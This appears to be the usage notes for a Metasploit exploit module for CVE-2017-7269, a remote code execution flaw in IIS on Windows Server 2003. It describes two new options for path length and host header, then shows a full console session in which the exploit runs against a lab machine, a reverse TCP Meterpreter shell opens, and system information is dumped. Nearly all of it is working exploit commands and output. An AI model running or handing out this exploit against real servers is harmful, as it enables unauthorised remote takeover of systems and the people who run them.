fix not work when length of physical path not equal to 19,or has a host binding.
add options: PhysicalPathLength,HttpHost
for test:
host phyiscal path: c:\inetpub\ , length=11
msf > use exploit/windows/iis/cve-2017-7269
msf exploit(cve-2017-7269) > show options
Module options (exploit/windows/iis/cve-2017-7269):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpHost localhost yes http host for target
PhysicalPathLength 19 yes length of physical path for target(include backslash)
RHOST yes The target address
RPORT 80 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Microsoft Windows Server 2003 R2
msf exploit(cve-2017-7269) > set rhost 192.168.223.130
rhost => 192.168.223.130
msf exploit(cve-2017-7269) > set rport 8088
rport => 8088
msf exploit(cve-2017-7269) > set physicalpathlength 11
physicalpathlength => 11
msf exploit(cve-2017-7269) > set httphost zcgonvh-test.com
httphost => zcgonvh-test.com
msf exploit(cve-2017-7269) > exploit
[*] Started reverse TCP handler on 192.168.223.129:4444
[*] Sending stage (957487 bytes) to 192.168.223.130
[*] Meterpreter session 1 opened (192.168.223.129:4444 -> 192.168.223.130:1135) at 2017-03-30 18:13:41 -0400
meterpreter > sysinfo
Computer : ZCG-AA4B4E60208
OS : Windows .NET Server (Build 3790, Service Pack 2).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 3
Meterpreter : x86/windows
meterpreter >